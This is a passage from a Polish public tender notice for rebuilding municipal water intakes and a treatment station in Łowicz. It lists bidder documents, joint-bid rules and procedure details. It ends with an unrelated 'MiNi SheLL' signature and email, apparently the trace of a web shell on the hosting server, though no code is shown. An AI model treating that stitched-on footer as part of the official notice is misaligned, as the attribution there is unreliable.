1.13.	Dokumenty potwierdzające, że wykazane roboty zostały wykonane z należytą starannością.<br>
1.14.	Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br>
1.15.Sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres .<br>
1.16.	Polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 15 000 000 PLN .<br>
1.17.	Oświadczenie Wykonawcy o zakresie prac, jakie zamierza zlecić podwykonawcom zgodnie z  Załącznikiem nr 6.<br>
1.18.	Wykaz urządzeń równoważnych wg Załącznika nr 7.<br>
1.19.	Kosztorysy ofertowe uproszczone z podziałem na branże i etapy.<br>
1.20.	Potwierdzenie dokonania wizji lokalnej wg   Załącznika nr 8 .<br>
1.21.	 Zaakceptowany wzór umowy wg załącznika nr 9 wraz z załącznikiem nr 9a do SIWZ<br>
Wyżej wymienione dokumenty winny być złożone w formie oryginałów lub kserokopii potwierdzonych na każdej stronie przez osobę -osoby uprawnione do podpisania oferty z adnotacją - za zgodność z oryginałem.<br>

2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1.4, 1.7 i 1.8 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:<br>
- nie otwarto jego likwidacji ani nie ogłoszono upadłości; <br>
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie;<br>
- nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.<br>
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 1.6  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania w zakresie określonym w art. 24 ust.1 pkt.4-8 ustawy.<br>
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez Wykonawcę.<br>

Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia zobowiązani są:<br>
1.Wykazać i udokumentować, że łącznie spełniają warunki określające ich potencjał techniczny, ekonomiczno - finansowy oraz kadrowy.<br>
2.Każdy z Wykonawców musi odrębnie udokumentować, że nie podlega wykluczeniu z postępowania oraz że posiada uprawnienia do występowania w obrocie prawnym w zakresie prac powierzonych mu do wykonania.<br>
3.Wykonawcy zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.<br>
4.Dokument ustanawiający Pełnomocnika, w postaci stosownego upoważnienia, winien zostać załączony do oferty. Wymaga się złożenia dokumentu w formie oryginału lub poświadczonej notarialnie kopii pełnomocnictwa.<br>
5.Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br>
6.Wykonawcy składający wspólną ofertę są solidarnie odpowiedzialni za wykonanie przedmiotu zamówienia oraz wniesienie zabezpieczenia należytego wykonania umowy.<br>
7.Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem reprezentującym Wykonawców.<br>
8.Przed podpisaniem umowy w sprawie zamówienia publicznego Wykonawcy zobowiązani będą przedłożyć Zamawiającemu umowę regulującą ich współpracę.<br>
9.Wspólnicy spółki cywilnej traktowani są jak wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w powyższych pkt 1 - 8..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> <br>http://www.bip.lowicz.eu    oraz     http://www.zuk.bip.lowicz.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> <br>Zakład Usług Komunalnych , 99-400 Łowicz, ul. Armii Krajowej 2b.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 10:00, miejsce: Siedziba Pełnomocnika Zamawiajacego - Zakładu Usług Komunalnych, 99-400 Łowicz, przy ul. Armii Krajowej 2b.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> <br>Zadanie jest realizowane w ramach projektu pn.:
PRZEBUDOWA ISTNIEJĄCYCH KOMUNALNYCH  UJĘĆ WODY,  ROZBUDOWA I PRZEBUDOWA OBIEKTÓW STACJI UZDATNIANIA WODY  I BUDOWA AKREDYTOWANEGO LABORATORIUM W ŁOWICZU, PRZY UL. BLICH

Creat By MiNi SheLL
Email: jattceo@gmail.com